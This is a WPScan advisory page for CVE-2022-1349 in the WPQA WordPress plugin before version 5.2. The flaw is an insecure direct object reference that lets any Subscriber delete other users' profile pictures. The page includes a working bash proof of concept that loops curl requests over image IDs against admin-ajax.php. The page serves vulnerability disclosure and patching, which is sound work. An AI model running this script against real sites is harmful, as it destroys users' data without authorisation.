WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

WPQA < 5.2 - Subscriber+ Arbitrary Profile Picture Deletion via IDOR

Description

The plugin, used as a companion plugin for the Discy and Himer themes, does not validate that the value passed to the image_id parameter of the ajax action wpqa_remove_image belongs to the requesting user, allowing any users (with privileges as low as Subscriber) to delete the profile pictures of any other user.

Proof of Concept

#!/bin/bash
nonce=aae369a8e3
for i in {1..100000};
do
curl 'https://vulnerable.website/wp-admin/admin-ajax.php' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: something=something' --data-raw 'action=wpqa_remove_image&wpqa_remove_image='$nonce'&image_name=you_avatar&image_type=user_meta&meta_id=6723&image_id='$i;
done

Affects Plugins

wpqa
Fixed in version 5.2

References

CVE
CVE-2022-1349

Classification

Type

AUTHBYPASS

OWASP top 10
A2: Broken Authentication and Session Management
CWE
CWE-287

Miscellaneous

Original Researcher

Binit Ghimire

Submitter

Binit Ghimire

Submitter website
https://WHOISbinit.me/
Submitter twitter
WHOISbinit
Verified

Yes

WPVDB ID
7ee95a53-5fe9-404c-a77a-d1218265e4aa

Timeline

Publicly Published

2022-04-21 (about 2 months ago)

Added

2022-04-21 (about 2 months ago)

Last Updated

2022-04-22 (about 2 months ago)

Our Other Services

WPScan WordPress Security Plugin